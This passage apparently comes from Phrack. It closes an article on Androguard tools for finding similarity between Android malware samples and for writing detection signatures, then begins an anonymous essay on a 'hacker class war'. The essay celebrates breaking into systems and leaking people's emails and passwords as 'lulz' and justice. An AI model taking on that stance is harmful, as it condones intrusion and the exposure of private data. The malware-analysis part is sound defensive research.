Basically we are able to determine if two samples are from the same malware
|
|
family. If they are, the analyst can start his analysis from the similar
|
|
methods.
|
|
|
|
In the next part we will see how we can see the differences (what
|
|
instructions have been modified) between two similar methods. If we test
|
|
the tool by using two different samples (like opfake and foncy) we observe
|
|
the following:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/foncy/\
|
|
01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5
|
|
|
|
Elements:
|
|
IDENTICAL: 1
|
|
SIMILAR: 0
|
|
NEW: 2
|
|
DELETED: 38
|
|
SKIPPED: 0
|
|
--> methods: 33.333333% of similarities
|
|
#########################################################################
|
|
|
|
We see a strange similarity score due to the fact that all methods,
|
|
including those of small size, have been compared. We can skip the specific
|
|
case of methods having a small size using the "-s" option (to filter
|
|
according to the size of the method in bytes):
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/foncy/\
|
|
01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5 -s 10
|
|
|
|
Elements:
|
|
IDENTICAL: 0
|
|
SIMILAR: 0
|
|
NEW: 2
|
|
DELETED: 29
|
|
SKIPPED: 33
|
|
--> methods: 0.000000% of similarities
|
|
#########################################################################
|
|
|
|
We can do a lot of things with this kind of tool such as:
|
|
- detecting plagiarism between two android applications
|
|
- checking if an application is correctly protected with
|
|
an obfuscator
|
|
- extracting easily injected codes (if you know the original
|
|
application)
|
|
|
|
There are many other interesting "ways" to use this tool such as
|
|
discovering if malware samples have been written by the same author, or if
|
|
some pieces of code have been reused. Analyzing the "faketoken" [7] sample
|
|
and the "opfake.d" sample we have observed an interesting result.
|
|
|
|
The first sample "faketoken" is detected by 19/43 antivirus products on
|
|
VirusTotal [8]. The second sample "opfake.d" is detected by 16/41 antivirus
|
|
products on VirusTotal [9]. All of these antivirus products are using
|
|
different names with the exception of DrWeb.
|
|
|
|
Now if we run our tool we observe the following output:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/plagiarism/opfake/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
|
|
apks/plagiarism/opfake/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
|
|
|
|
Elements:
|
|
IDENTICAL: 951
|
|
SIMILAR: 5
|
|
NEW: 34
|
|
DELETED: 23
|
|
SKIPPED: 0
|
|
--> methods: 96.516954% of similarities
|
|
#########################################################################
|
|
|
|
We can skip specific libraries common to these samples such as
|
|
"Lorg/simpleframework/xml" and methods of small sizes. This provides us
|
|
with an even more interesting result:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/plagiarism/opfake/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
|
|
apks/plagiarism/opfake/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
|
|
-e "Lorg/simpleframework/" -s 100 -d
|
|
|
|
Elements:
|
|
IDENTICAL: 9
|
|
SIMILAR: 3
|
|
NEW: 14
|
|
DELETED: 11
|
|
SKIPPED: 5260
|
|
--> methods: 44.998713% of similarities
|
|
|
|
SIMILAR methods:
|
|
Ltoken/bot/MainApplication; loadStartSettings
|
|
(Ljava/lang/String;)Ltoken/bot/StartSettings; 230
|
|
--> Lcom/load/wap/MainApplication; loadStartSettings
|
|
(Ljava/lang/String;)Lcom/load/wap/StartSettings; 190 0.375
|
|
|
|
Ltoken/bot/MainService; threadOperationRun
|
|
(I Ljava/lang/Object;)V 197
|
|
--> Lcom/load/wap/MainService; threadOperationRun
|
|
(I Ljava/lang/Object;)V 122 0.319999992847
|
|
|
|
Ltoken/bot/ServerResponse; ()V 133
|
|
--> Lcom/load/wap/ServerResponse; ()V 125 0.214285716414
|
|
|
|
IDENTICAL methods:
|
|
Ltoken/bot/Settings; isDeleteMessage (Ljava/lang/String;
|
|
Ljava/lang/String;)Z 132
|
|
--> Lcom/load/wap/Settings; isDeleteMessage
|
|
(Ljava/lang/String; Ljava/lang/String;)Z 132
|
|
|
|
Ltoken/bot/UpdateActivity; setMainScreen ()V 107
|
|
--> Lcom/load/wap/UpdateActivity; setMainScreen ()V 107
|
|
|
|
Ltoken/bot/MainApplication; sendGetRequest (Ljava/lang/String;
|
|
Ljava/util/List;)V 132
|
|
--> Lcom/load/wap/MainApplication; sendGetRequest
|
|
(Ljava/lang/String; Ljava/util/List;)V 132
|
|
|
|
Ltoken/bot/MainService; onStart (Landroid/content/Intent; I)V 106
|
|
--> Lcom/load/wap/MainService; onStart
|
|
(Landroid/content/Intent; I)V 106
|
|
|
|
Ltoken/bot/MainApplication; sendPostRequest (Ljava/lang/String;
|
|
Ljava/util/List;)V 197
|
|
--> Lcom/load/wap/MainApplication; sendPostRequest
|
|
(Ljava/lang/String; Ljava/util/List;)V 197
|
|
|
|
Ltoken/bot/MainApplication; DownloadApk (Ljava/lang/String;
|
|
Ljava/lang/String;)Z 106
|
|
--> Lcom/load/wap/MainApplication; DownloadApk
|
|
(Ljava/lang/String; Ljava/lang/String;)Z 106
|
|
|
|
Ltoken/bot/Settings; isCatchMessage (Ljava/lang/String;
|
|
Ljava/lang/String;)Ltoken/bot/CatchResult; 165
|
|
--> Lcom/load/wap/Settings; isCatchMessage
|
|
(Ljava/lang/String; Ljava/lang/String;)
|
|
Lcom/load/wap/CatchResult; 165
|
|
|
|
Ltoken/bot/MainApplication; getContacts
|
|
(Landroid/content/Context;)Ljava/util/Vector; 230
|
|
--> Lcom/load/wap/MainApplication; getContacts
|
|
(Landroid/content/Context;)Ljava/util/Vector; 230
|
|
|
|
Ltoken/bot/MainApplication; dateFromString
|
|
(Ljava/lang/String;)Ljava/util/Date; 103
|
|
--> Lcom/load/wap/MainApplication; dateFromString
|
|
(Ljava/lang/String;)Ljava/util/Date; 103
|
|
#########################################################################
|
|
|
|
As we can see, the names of the methods are "exactly" the same, and the
|
|
signatures (the bytecodes with a high probability) are the same. It can be
|
|
really interesting to detect if your software has been ripped off by
|
|
someone.
|
|
|
|
----[ 3.2 Differences between two applications
|
|
|
|
Up to this point, we have a tool which is able to recognize similar
|
|
methods, but we would like more information about the differences between
|
|
each method.
|
|
|
|
For that we will apply the same algorithm but we will change the
|
|
"granularity" and focus on basic blocks in order to extract differences.
|
|
However, in this specific case, we will not use our classical signature for
|
|
each basic block but rather a simple "string" which represents the sequence
|
|
of instructions. So, finally, as in the previous algorithm, we will have:
|
|
- identical basic blocs
|
|
- similar basic blocs
|
|
- new basic blocs
|
|
- deleted basic blocs
|
|
|
|
With the list of similar basic blocks, we can apply a standard "diff"
|
|
algorithm between each similar basic blocks to know which instructions have
|
|
been added or removed.
|
|
|
|
The Longuest Common Subsequence (LCS) algorithm [11] can then be used to
|
|
obtain all differences. In order to apply the LCS algorithm, we will map
|
|
each unique instruction to a simple string:
|
|
|
|
ADD 3 -> "\00"
|
|
ADD 1 -> "\01"
|
|
MOV 3 -> "\02"
|
|
ADD 3 -> "\00"
|
|
|
|
If we have two basic blocks, we must translate each basic block into a
|
|
final string:
|
|
|
|
ADD 3
|
|
ADD 1
|
|
SUB 2
|
|
IGET => "\x00\x01\x02\x03\x00\x04"
|
|
ADD 3
|
|
GOTO
|
|
|
|
ADD 3
|
|
ADD 3
|
|
SUB 2
|
|
IGET => "\x00\x00\x02\x03\x05\x04"
|
|
MUL 4
|
|
GOTO
|
|
|
|
The application of the LCS algorithm[11] between these two strings reveals
|
|
the instructions that have been added or removed:
|
|
|
|
#########################################################################
|
|
In [5]: from elsim_dalvik.py import LCS
|
|
In [7]: a = "\x00\x01\x02\x03\x00\x04"
|
|
In [9]: b = "\x00\x00\x02\x03\x05\x04"
|
|
In [10]: z = LCS(a, b)
|
|
|
|
In [12]: from elsim_dalvik import getDiff
|
|
In [13]: l_a = []
|
|
In [14]: l_r = []
|
|
In [15]: getDiff(z, a, b, len(a), len(b), l_a, l_r)
|
|
In [16]: l_a
|
|
Out[16]: [(1, '\x00'), (4, '\x05')]
|
|
// "ADD 3" and "MUL 4" have been added in the second basic bloc
|
|
In [17]: l_r
|
|
Out[18]: [(1, '\x01'), (4, '\x00')]
|
|
// ""ADD 1" and "ADD 3" have been remove in the first basic bloc
|
|
#########################################################################
|
|
|
|
Although it's also possible to use a better algorithm such as the Needleman
|
|
algorithm [10] (used in biology for "sequence alignment" [12], or in the
|
|
comparison of network traces [35]), the tests performed have demonstrated
|
|
that the LCS algorithm was sufficient.
|
|
|
|
Now, we have a new tool called "androdiff.py" which can be used to extract
|
|
and observe differences between two Android applications. We have tested it
|
|
against two versions of the Skype application to analyze the patch of a
|
|
security vulnerability [13] (mainly due to incorrect use of file
|
|
permissions):
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
elsim/examples/android/com.skype.raider_1.0.0.831.apk
|
|
elsim/examples/android/com.skype.raider_1.0.0.983.apk -c BZ2
|
|
|
|
Elements:
|
|
IDENTICAL: 2059
|
|
SIMILAR: 167
|
|
NEW: 27
|
|
DELETED: 0
|
|
SKIPPED: 0
|
|
--> methods: 98.192539% of similarities
|
|
#########################################################################
|
|
|
|
We have several methods to analyze, but only a few new methods are present,
|
|
and two of them are particularly interesting:
|
|
|
|
#########################################################################
|
|
Lcom/skype/ipc/SkypeKitRunner; chmod (Ljava/io/File;
|
|
Ljava/lang/String;)Z 61
|
|
Lcom/skype/ipc/SkypeKitRunner; fixPermissions ([Ljava/io/File;)V 47
|
|
#########################################################################
|
|
|
|
So we can now search in the similar methods where these new methods are
|
|
called:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androdiff.py -i
|
|
elsim/examples/android/com.skype.raider_1.0.0.831.apk
|
|
elsim/examples/android/com.skype.raider_1.0.0.983.apk -d
|
|
[...]
|
|
[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ] <->
|
|
[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ]
|
|
run-BB@0xae run-BB@0xae
|
|
Added Elements(2)
|
|
0xba 3 invoke-virtual v8 , [ meth@ 5897
|
|
Ljava/security/MessageDigest; reset ['()', 'V'] ]
|
|
0xc0 4 sget-object v9 , [ field@ 1299
|
|
Lcom/skype/ipc/SkypeKitRunner; [B MAITSEAINE ]
|
|
Deleted Elements(0)
|
|
|
|
run-BB@0x320 run-BB@0x316
|
|
Added Elements(1)
|
|
0x332 5 const/4 v8 , [ #+ 0 ] // {0}
|
|
Deleted Elements(1)
|
|
0x328 5 const/4 v8 , [ #+ 3 ] // {3}
|
|
|
|
run-BB@0x352 run-BB@0x348
|
|
Added Elements(1)
|
|
0x364 4 const-string v5 , [ string@ 2921 'chmod 750 ' ]
|
|
Deleted Elements(1)
|
|
0x35a 4 const-string v5 , [ string@ 2904 'chmod 777 ' ]
|
|
|
|
run-BB@0x52c run-BB@0x522
|
|
Added Elements(10)
|
|
0x59e 29 invoke-virtual v4 , [ meth@ 109
|
|
Landroid/content/Context; getFilesDir ['()', 'Ljava/io/File;'] ]
|
|
0x5a4 30 move-result-object v4
|
|
0x5a6 31 invoke-virtual v4 , [ meth@ 5719
|
|
Ljava/io/File; getAbsolutePath ['()',
|
|
'Ljava/lang/String;'] ]
|
|
0x5ac 32 move-result-object v4
|
|
0x5be 37 move-object/from16 v0 , v19
|
|
0x5c2 38 iget-object v0 , v0 , [ field@ 1314
|
|
Lcom/skype/ipc/SkypeKitRunner;
|
|
Landroid/content/Context; mContext ]
|
|
0x5c6 39 move-object v4 , v0
|
|
0x5d8 44 move-object/from16 v0 , v19
|
|
0x5dc 45 move-object v1 , v4
|
|
0x5de 46 invoke-direct v0 , v1 , [ meth@ 1923
|
|
Lcom/skype/ipc/SkypeKitRunner; fixPermissions
|
|
['([Ljava/io/File;)', 'V'] ]
|
|
Deleted Elements(0)
|
|
[...]
|
|
#########################################################################
|
|
|
|
As you can see, some constants are changed (3 to 0, 777 to 750) to patch an
|
|
incorrect use of file permissions (you need to take the original CFG to
|
|
view the details (maybe in a new version we will see the results in one
|
|
CFG)). A new method is called to fix the existing permissions of the files.
|
|
|
|
----[ 3.3 Looking for a signature in applications
|
|
|
|
Now, if you wish to detect if a specific method (or a class) is present in
|
|
another application, you need to check all methods of this application with
|
|
your method.
|
|
|
|
Moreover, if we have a database of signatures, we must check if each
|
|
signature is present in our application. For example, if your database is
|
|
composed of 1000 signatures, and our application contains 1000 methods we
|
|
will need to perform:
|
|
- 1000 * 1000 -> 1.000.000 of comparisons to know the result
|
|
|
|
That's why we need another solution and we will use the second algorithm
|
|
(2.2). In this algorithm we need a set of float values to perform the
|
|
clustering. So, in this example, we will use different sources of
|
|
entropies.
|
|
|
|
We have already described the generic algorithm (2.2), so we only need to
|
|
define our element in this implementation. An element (in fact a part of
|
|
our signature) will be composed of:
|
|
- a string which represents the method (or the class)
|
|
(in fact it is a signature obtained by the grammar (3.1))
|
|
- a set of entropies (float values)
|
|
|
|
The most important part is the set of entropies. We have used different
|
|
sources of entropies to have better results. An Android application
|
|
provides an important amount of information. One of them is the API that is
|
|
used (the Android/Java API). Another one is the exceptions because they
|
|
define very well a method. We can also use the entropy of the signature and
|
|
the bytecode. Maybe we have redundancy by using these entropies (due to the
|
|
fact that the entropy of the signature is composed of both the Android/Java
|
|
packages and the exceptions), so we need to work more on this subject but
|
|
this problem will not produce false positives.
|
|
|
|
We will also define a simple JSON file that we will use to generate our
|
|
signature in order to extract information like the entropies and to add it
|
|
in a database. We take the "logastrod" [14] malware and we create the
|
|
signature after the analysis of this malware in order to find where are the
|
|
most interesting malicious parts:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ cat signatures/logastrod.sign
|
|
[ { "SAMPLE" :
|
|
"apks/malwares/logastrod/ \
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983"
|
|
}, { "BASE" : "AndroidOS", "NAME" : "Logastrod", "SIGNATURE" :
|
|
[ { "TYPE" :
|
|
"METHSIM", "CN" : "Lcom/pavel/newmodule/RuleActivity;", "MN" : "onCreate",
|
|
"D" : "(Landroid/os/Bundle;)V" }, { "TYPE" : "METHSIM", "CN" :
|
|
"Lcom/pavel/newmodule/LicenseActivity;", "MN" : "onCreate", "D" :
|
|
"(Landroid/os/Bundle;)V" } ], "BF" : "a && b" } ]
|
|
#########################################################################
|
|
|
|
The name of this signature is "Logastrod" and we need to recognize the two
|
|
methods (the boolean formula) to make a positive match.
|
|
|
|
By using the "androcsign.py" tool we can extract the entropies and
|
|
signatures of the methods from the specified sample, and add it to our
|
|
database:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androcsign.py -i signatures/logastrod.sign -d
|
|
signatures/dbandroguard
|
|
[{u'Logastrod': [[[0, 'Qlt[...]kdd',
|
|
4.809434597538392, 4.584117420715886, 4.538809415871831, 0.0]], u'a && b'
|
|
]}]
|
|
#########################################################################
|
|
|
|
Now it is possible to use "androsign.py" to check a particular file or an
|
|
entire directory by using a database of signatures.
|
|
|
|
"f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9" is a
|
|
sample of this "logastrod" malware:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsign.py -i
|
|
apks/malwares/logastrod/f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36
|
|
659cb809f13d9 -b signatures/dbandroguard -c signatures/dbconfig -v
|
|
[SIGN:69 CLUSTERS:10
|
|
CMP_CLUSTERS:8 ELEMENTS:31 CMP_ELEMENTS:39 -> 2139 1.823282%] [[91, 92,
|
|
0.27931034564971924], [91, 93, 0.18803419172763824]] ----> Logastrod
|
|
#########################################################################
|
|
|
|
As you can see, we have only done "39" comparisons thanks to the
|
|
clustering. Without this method, "2139" comparisons would have been
|
|
required for the same result.
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsign.py -d apks/malwares/logastrod/ -b
|
|
signatures/dbandroguard -c signatures/dbconfig
|
|
f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 : ---->
|
|
Logastrod
|
|
a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 : ---->
|
|
Logastrod
|
|
77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de : ---->
|
|
Logastrod
|
|
fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f : ---->
|
|
Logastrod
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 : ---->
|
|
Logastrod
|
|
e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 : ---->
|
|
Logastrod
|
|
#########################################################################
|
|
|
|
We can see that on VirusTotal all these samples are not detected
|
|
identically by few AV products:
|
|
|
|
#########################################################################
|
|
f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 :
|
|
22/43 antivirus
|
|
a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 :
|
|
19/43 antivirus
|
|
77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de :
|
|
22/43 antivirus
|
|
fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f :
|
|
21/43 antivirus
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 :
|
|
19/43 antivirus
|
|
e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 :
|
|
21/43 antivirus
|
|
#########################################################################
|
|
|
|
We maintain an Open Source Database of Android Malware [15] where you can
|
|
find analysis links and a few signatures for Android malware. The main
|
|
difficulty is to create a signature because you must choose carefully which
|
|
method/class you wish to add to the database in order to avoid as much as
|
|
possible false positives. In other terms, don't add a method/class from a
|
|
free/proprietary "API" or project in a malware database :)
|
|
|
|
You can use this tool to check if your application has been stolen by
|
|
someone else using a multiple file analysis. Imagine that you have created
|
|
an uber open source && l33t algorithm and you wish to know if your
|
|
algorithm has been ripped off and included in a proprietary software. Of
|
|
course, it is possible to build databases of many "things", from a
|
|
cryptographic functions database to a DNA database...
|
|
|
|
--[ 4 - Conclusion
|
|
|
|
The similarity is a difficult problem but it is possible to achieve an
|
|
interesting result by using the NCD and the entropy with "normalized"
|
|
data.
|
|
|
|
So, at the end of this paper, you will find two tools. The first one is
|
|
Androguard in the first stable 1.0 version. Androguard is a known framework
|
|
in Python to manipulate, reverse engineer, and play with Android
|
|
applications. The stable version we release with this paper brings a lot of
|
|
new things (especially the stability of the similarities tools) and a few
|
|
tips and tricks to reverse engineer Android Apps (such as dealing with
|
|
non-ASCII names).
|
|
|
|
In this framework, several tools are using the new open source software
|
|
Elsim to search the similarities/dissimilarities in different sets of
|
|
elements. We have described two kinds of "generic" algorithms. The first
|
|
one can be used if you wish to find the similarities between two sets of
|
|
elements. The second one can be used if you have a database of signatures
|
|
and you need a quick engine to search the signatures in a set of elements.
|
|
|
|
Finally we described a new algorithm of entropy ("Descriptional entropy")
|
|
which can be used to classify and obtain more information from an element
|
|
and two new algorithms which can help you to answer to a similarity
|
|
"problem".
|
|
|
|
But Elsim is not limited to Android applications, and the tool will be
|
|
improved in the next months to support x86 and ARM binaries in order to
|
|
have an open source software with such capabilities.
|
|
|
|
Many thanks to the Phrack staff for the suggestions on how to improve this
|
|
work.
|
|
|
|
"Talk is cheap. Show me the code". Torvalds, Linus"
|
|
|
|
--[ 5 - References
|
|
|
|
[1] Androguard. http://code.google.com/p/androguard/
|
|
[2] Silvio Cesare (2010). "Classification of malware using structured
|
|
control flow".
|
|
[3] MacQueen, J. B. (1967). "Some Methods for classification and Analysis
|
|
of Multivariate Observations".
|
|
[4] Android source code (dalvik). http://source.android.com/
|
|
[5] Foncy Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#foncy
|
|
[6] Opfake Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#opfake_\
|
|
(all)
|
|
[7] Faketoken Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#faketoken
|
|
[8] https://www.virustotal.com/file/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79/analysis/
|
|
[9] https://www.virustotal.com/file/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac/analysis/
|
|
[10] Needleman, Saul B and Wunsch, Christian D. (1970). "A general method
|
|
applicable to the search for similarities in the amino acid sequence
|
|
of two proteins"
|
|
[11] L. Bergroth and H. Hakonen and T. Raita (2000). "A Survey of Longest
|
|
Common Subsequence Algorithms".
|
|
[12] Sequence Alignement. http://en.wikipedia.org/wiki/Sequence_alignment
|
|
[13] Android Police. http://www.androidpolice.com/2011/04/14/\
|
|
exclusive-vulnerability-in-skype-for-android-is-exposing-your-name\
|
|
-phone-number-chat-logs-and-a-lot-more/.
|
|
[14] Logastrod Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#Logastrod
|
|
[15] Opensource Database of Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares
|
|
[16] Manuel Cebrian, Manuel Alfonseca and Alfonso Ortega. "Common Pitfalls
|
|
Using Normalized Compression Distance: What to Watch Out for in a
|
|
Compressor"
|
|
[17] R. Cilibrasi and P. M. B. Vitanyi. "Clustering by compression"
|
|
[18] Kolmogorov A. N (1965). "Three Approaches for Defining the Concept
|
|
of Information Quantity"
|
|
[19] Snappy compressor. http://code.google.com/p/snappy/
|
|
[20] Cilibrasi, R. & Vitanyi, P. (2005). "Clustering by compression"
|
|
[21] Dullien, T. & Rolles, R. (2005). "Graph-based comparison of
|
|
executable objects"
|
|
[22] M. Li and P. Vitanyi (1997). "An introduction to Kolmogorov
|
|
Complexity and Its Applications"
|
|
[23] D. Sankoff and J. Kruskal (1983, 1989).
|
|
"Time warps, string edits and macromolecules"
|
|
[24] J. Shallit, M.-W. Wang. "Automatic Complexity of Strings".
|
|
[25] T. Sabin. "Comparing binaries with graph isomorphisms".
|
|
http://razor.bindview.com/publish/papers/comparingbinaries.html
|
|
[26] Wikipedia: http://en.wikipedia.org/wiki/Kolmogorov_complexity
|
|
[27] Jesus Freke. http://code.google.com/p/smali/
|
|
[28] http://en.wikipedia.org/wiki/Cluster_analysis
|
|
[29] A. D. Danaksok and F. G. Gologlu, On Lempel-Ziv. "Complexity of
|
|
Sequences"
|
|
[30] Lempel, A., Ziv, J. "On the complexity of finite sequences"
|
|
[31] S. Janson, S. Lonardi and W. Szpankowski. "On average sequence
|
|
complexity"
|
|
[32] J. Shallit. "On the maximum number of distinct factors in a
|
|
binary string"
|
|
[33] http://www.c-sharpcorner.com/uploadfile/acinonyx72/calculating\
|
|
-the-normalized-compression-distance-between-two-strings/$
|
|
[34] SMILES
|
|
http://en.wikipedia.org/wiki/Simplified_molecular-input_line-entry_system
|
|
[35] Netzob http://www.netzob.org/
|
|
|
|
--[ 6 - Code
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x10 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ Lines in the Sand: ]=-------------------------=|
|
|
|=-----------=[ Which Side Are You On in the Hacker Class War ]=---------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ by Anonymous ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
---
|
|
|
|
With dramatically growing hacker and leaker activity paralleling the
|
|
revolutionary upheavals around the world, we are increasingly hearing the
|
|
rhetoric of "cyberwar" thrown around by governments attempting to maintain
|
|
legitimacy and exercise more police-state powers. In talking about the
|
|
FBI's priorities ten years after 9/11, FBI director Robert Mueller stated
|
|
in a recent speech at the International Association of Chiefs of
|
|
Police(IACP) conference that "the next threat will be cyber-based ...
|
|
self-radicalized individuals using online resources and individuals
|
|
planning cyber attacks" [21]. Although hackers made a mockery of Mueller
|
|
and the IACP during the conference by defacing their websites, it is hard
|
|
to believe that hackers are a bigger threat than the "terrorists". Still,
|
|
this logic is being used to send many more billions of dollars into white
|
|
hat pockets at private military and intelligence contracted corporations to
|
|
develop better defensive and offensive technology. The US is also proposing
|
|
several changes to the 1986 Computer Fraud and Abuse Act, providing
|
|
increased sentences (including mandantory minimums) as well as RICO Act
|
|
classifications for computer hacking. For the most part, the increased
|
|
hacker busts have largely targeted small-time defacers and DDoS kids
|
|
allegedly affiliated with Anonymous - hardly the "foreign terrorist threat
|
|
to critical infrastructure" used to justify the proposed increased
|
|
penalties for hackers and increased cashflow to the security industry. But
|
|
there's more than small timers at play: attacks against high profile
|
|
institutions including law enforcement, military and corporate targets have
|
|
escalated, becoming both more destructive as well as more politically
|
|
articulate. We're experiencing the opening stages of the next Hacker Class
|
|
War, and with many factions at play each operating with their own agenda
|
|
and strategies, with more and more hackers breaking into shit for the rev
|
|
or selling out to the military intelligence industrial complex, the
|
|
question is asked "which side are you on"?
|
|
|
|
U.S. military officials, eager to talk about how the Pentagon has boosted
|
|
its computer defenses, often remain quiet when asked about its offensive
|
|
Internet capabilities. A list of cyber capabilities-- available only to
|
|
policymakers-- is described as ranging from planting a computer virus to
|
|
bringing down electric grids [1]. This would not be possible if it were not
|
|
for the assistance of computer hackers working directly or indirectly for
|
|
the Department of Defense, as well as the tendency in our communities to
|
|
support or tolerate those who choose to do so. Unfortunately, this
|
|
mentality is frequently espoused by figureheads commonly quoted in
|
|
mainstream news articles, where they claim to speak on behalf of the hacker
|
|
community. Conversely, there has always been resentment from black hats and
|
|
the criminally minded for the corporate sellouts who claim to be hackers
|
|
but instead choose to protect systems against those who actually break into
|
|
them. Much has been written about the corrupt white hats who work to
|
|
protect vital infrastructure against other, more fun-loving hackers. Many
|
|
lulz have been had over the years every time these big shots get owned and
|
|
all of their emails and passwords are released in nicely formatted .txt
|
|
files. Besides FBI collaborating fucks and security "professionals", it is
|
|
time to call out the other emerging threat to the integrity of our scene:
|
|
the US military's active effort to train and recruit hackers into aiding US
|
|
cyber "defense" systems.
|
|
|
|
With the passage of the 2012 Defense Authorization bill, the DoD has
|
|
"express authority to conduct clandestine military activities in cyberspace
|
|
in support of military operations". Reuters reports that "the Pentagon has
|
|
put together a classified list of its offensive cyber capabilities so
|
|
policymakers know their option". To what extent the US has already engaged
|
|
in offensive electronic attacks is for the most part speculative. It is
|
|
widely speculated that the US or Israeli military, or both cooperating,
|
|
developed STUXNET to destroy Iran's nuclear facilities [2].
|
|
|
|
To fill the need for skilled security people, the military operates several
|
|
schools and training classes designed to turn young enlisted computer
|
|
enthusiasts into skilled hackers. The US Military Academy in West Point, NY
|
|
has an ACM SIGSAC chapter which teaches special classes on remote intrusion
|
|
techniques and periodically hosts several live hacking competitions to
|
|
"train and engage enlisted military, officer, or government-affiliated
|
|
civilians". Last April, the West Point team was victorious over "veteran
|
|
hackers from the NSA" at the 2011 Cyber Defense Exercise. Other military
|
|
hacker teams such as ddtek (as led by Lt. Cmdr Chris Eagle who regularly
|
|
speaks at DEFCON and Blackhat) also compete in civilian hacker tournaments
|
|
such as DEFCON's CTF, usually dominating the competition by bringing dozens
|
|
of Navy cybersecurity graduates [3][4]. No doubt many of these people will
|
|
eventually be working at USCYBERCOM or other clandestine military hacker
|
|
operations to launch attacks on behalf of the rich ruling class.
|
|
|
|
The US government must not have too much faith in their enlisted hackers,
|
|
because they collaborate with a variety of private companies and
|
|
individuals to defend their networks as well as profiling, infiltrating and
|
|
attacking their enemies. After LulzSec owned and leaked emails for the CEO
|
|
of military-contracted security firm Unveillance and Infragard member Karim
|
|
Hijazi, he was exposed to have been working with the DoD and the White
|
|
House to not only profile "main hacking groups in Libya and their
|
|
supporters" but also take the offensive and "map out Libya's Oil companies
|
|
and their SCADA system's vulnerabilities" [5]. Even after Karim was owned
|
|
and exposed he was willing to pay cash and offer his botnet to LulzSec to
|
|
destroy his competitors, further revealing the white hat's corrupt and
|
|
backstabbing nature as well as revealing how desperate and vulnerable the
|
|
most powerful military in the world really is.
|
|
|
|
Then there's Aaron Barr, the former CEO of HBGary Federal, who was served
|
|
with swift and fierce justice-- being exposed for engaging in
|
|
counter-intelligence operations attempting to disrupt both WikiLeaks (where
|
|
he suggests "cyber attacks against the infrastructure to get data on
|
|
document submitters") and Anonymous (where he cooperated with the FBI
|
|
attempting to profile "key leaders") [6]. The leaked emails also reveal a
|
|
bid to develop "persona management software" for the US military which is
|
|
another COINTELPRO-type tool to spread propaganda by creating an army of
|
|
fake twitter, facebook, blog, forum accounts to subvert democracy and
|
|
manipulate public opinion. Although Barr/HBGary and
|
|
Karim/Unveillance/Infragard have been exposed and humiliated, the
|
|
implications of what has been released involving their work demonstrate a
|
|
frightening and possibly illegal conspiracy between private security
|
|
corporations collaborating with government and military to silence and
|
|
disrupt their political opponents.
|
|
|
|
Despite the obvious failures of their affiliates, the military continues to
|
|
try to draw talent from independent hackers. DARPA made a public offering
|
|
to hackerspaces in the US to do "research designed to help give the U.S.
|
|
government tools needed to protect against cyberattacks". The program
|
|
Cyber-Insider (CINDER) is headed by Peiter "Mudge" Zatko [7] who-- like
|
|
many of us-- used to be a teenage hacker associated with the Cult of the
|
|
